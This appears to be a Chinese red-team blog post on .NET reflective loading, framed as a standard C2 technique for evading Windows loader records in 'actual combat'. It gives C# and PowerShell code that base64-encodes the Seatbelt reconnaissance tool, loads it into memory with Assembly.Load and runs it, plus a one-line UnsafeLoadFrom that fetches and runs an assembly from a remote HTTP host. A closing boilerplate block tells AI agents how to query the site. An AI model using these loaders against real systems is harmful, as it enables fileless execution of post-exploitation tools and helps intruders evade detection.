# .NET Reflective Injection ## 简介 反射注入(ReflectiveInjection)这种技术也出来好多年了,实现原理大致是不依赖windows提供的loadlibrary函数,程序设计者自己在程序内实现pe的内存展开,由于是自己实现,所以不会在操作系统中有所记录,以及可以对展开的pe文件做一些处理如抹除DOS头,同时不会在peb的ldr链表中记录,发展至今反射注入几乎已经是所有c2的标配技术,github也有非常成熟的项目可供使用,不过由于使用量较大,建议还是简单修改一下再投入实战比较好。 上面提到的东西和本文没有任何关联(略略略),.net自身提供了反射加载接口,由于支持内存加载,使用起来会非常方便,不过只能加载.net的程序集,在实战中我们也经常使用这个功能,本篇文章会记录一些System.Reflection命名空间的使用方法。 ## 思路 这玩意也没什么思路 1. base64编码一个.net程序集 2. 把base64的程序集解码成一个内存数组 3. 使用System.Reflection.Assembly.Load内存加载 4. assembly.EntryPoint.Invoke调用入口点 ## 代码 这里直接贴代码。 ### c\# ``` using System; using System.IO; using System.Reflection; namespace MemoryLoadApplication { class Program { static void Main(string[] args) { byte[] buffer = File.ReadAllBytes(@"C:\Users\Black Sheep\source\repos\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe"); string base64str = Convert.ToBase64String(buffer); string dir = Directory.GetCurrentDirectory(); buffer = Convert.FromBase64String(base64str); File.WriteAllText($"{dir}\\base64.txt", base64str); Assembly assembly = System.Reflection.Assembly.Load(buffer); assembly.EntryPoint.Invoke(null, new object[] { args }); } } } ``` ### powershell ``` $base64 = "TVqQAAMAAAAEAAA(前面生成的base64编码的程序集)"; $bins = [System.Convert]::FromBase64String($base64); $invoke = [System.Reflection.Assembly]::Load($bins); [System.Console]::WriteLine($invoke); $args = New-Object -TypeName System.Collections.ArrayList [string[]]$strings = "-group=all","-full" $args.Add($strings) $invoke.EntryPoint.Invoke($N,$args.ToArray()); ``` 也可以远程加载 ``` $invoke = [System.Reflection.Assembly]::UnsafeLoadFrom("http://192.168.0.125/base"); ``` ### 实现效果 ![](/files/-MNaQ5CN24zs42wiOilP) ![](/files/-MNaQJIanvy48tg4qHw1) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://idiotc4t.com/code-and-dll-process-injection/.net-fan-she-jia-zai.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.